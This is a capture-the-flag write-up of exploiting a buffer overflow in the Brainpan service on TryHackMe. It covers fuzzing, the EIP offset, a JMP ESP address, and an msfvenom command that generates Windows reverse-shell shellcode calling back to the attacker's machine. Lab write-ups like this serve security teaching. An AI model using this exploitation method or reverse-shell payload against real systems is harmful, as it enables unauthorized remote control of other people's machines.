BrainPan-Tryhackme

Exploit a buffer overflow vulnerability by analyzing a Windows executable.

Enumeration

Perform a quick rustscan to view open ports.

Port our results to nmap.

Not much information but I tried opening them on my browser. Port 9999 gave nothing but 10000 opens up a website as shown below.

I bruteforced for some directories and found something interesting.

This directory contains an executable file which is the application running on port 9999.

Trying a netcat to port 9999. We get this password prompt.

Fuzzing

We are working with a buffer overflow, so let us trying crashing the application running on port 9999

We indeed get a crashing confirming existence of a buffer overflow.

Download the executable file and transfer it to your Windows VM. We will work with Immunity debugger.

Run the application and try connecting to it using our VM’s IP.

We can test the connection using netcat. We get the connection back. Everything set up, let’s get hacking :)

Step 1: Finding the size of the crash

We need to find the approximate number of bytes that crashed our application. Attach it to immunity debugger and we can write a python script to send some bytes to the application till it crashes.

Head over to immunity debugger and see that our application crashed

To calculate the size of the crash, right click on esp , follow in dump. Check the address where the As start and end

We get 2072. We will use this as the default length of bytes.

Modify our script as follows.

Step 2: Finding the offset

Next we need to find out the exact number of bytes within the total_length that actually cause the crash. We use msf pattern create and pattern offset.

/usr/bin/msf-pattern_create -l 2072

Copy the result and modify our script as follows

Run the script and note the value of the EIP

/usr/bin/msf-pattern_offset -l 2072 -q 35724134                       
[*] Exact match at offset 524

We get our offset at 524. This means we have exactly 524 bytes before we reach the EIP register

Step 3: Controlling the EIP

We modify our script as follows and observe the EIP register

We try controlling the EIP with 4Bs and get the ascii value for B as 42424242 on the EIP register.

We have control over the EIP.

Step 4: Finding the bad characters

We need to determine the characters that brainpan does not like. This will help us create our payload without the bad characters.

I like to use the struct inbuilt module with list comprehension. Modify your script as follows and send the bad characters.

We can observe the characters in the hex dump and see if we get any bad ones. Luckily for us there are no bad characters here.

Step 5: Finding a JMP ESP instruction

We need to find a JMP ESP instruction that will take us to the top of the stack. We will use this JMP ESP as the new EIP so that we hijack the control flow of the program.

We can use the mona module

!mona jmp -r esp 

We get an address that points to a jmp esp instruction

0x311712F3

Set a breakpoint at that instruction. Ctrl+G , enter the address value then press enter and set breakpoint.

Modify our script as follows and observe that we hit the breakpoint,

step through the code using f7 and observe how we get redirected to the top of the stack

Step 6: Generating shellcode

Now we can generate shellcode to get a reverse shell on our program

msfvenom -p windows/shell_reverse_tcp LHOST=wlan0 LPORT=4444 -e x86/shikata_ga_nai -f py -b "\x00"

Modify our script and send the payload while listening on port 4444

Sweet :) Our exploit worked. Now recreate the shellcode but with tun0 for tryhackme local IP. Change the IP in the script to the remote IP

We get a shell :)

Happy hacking :)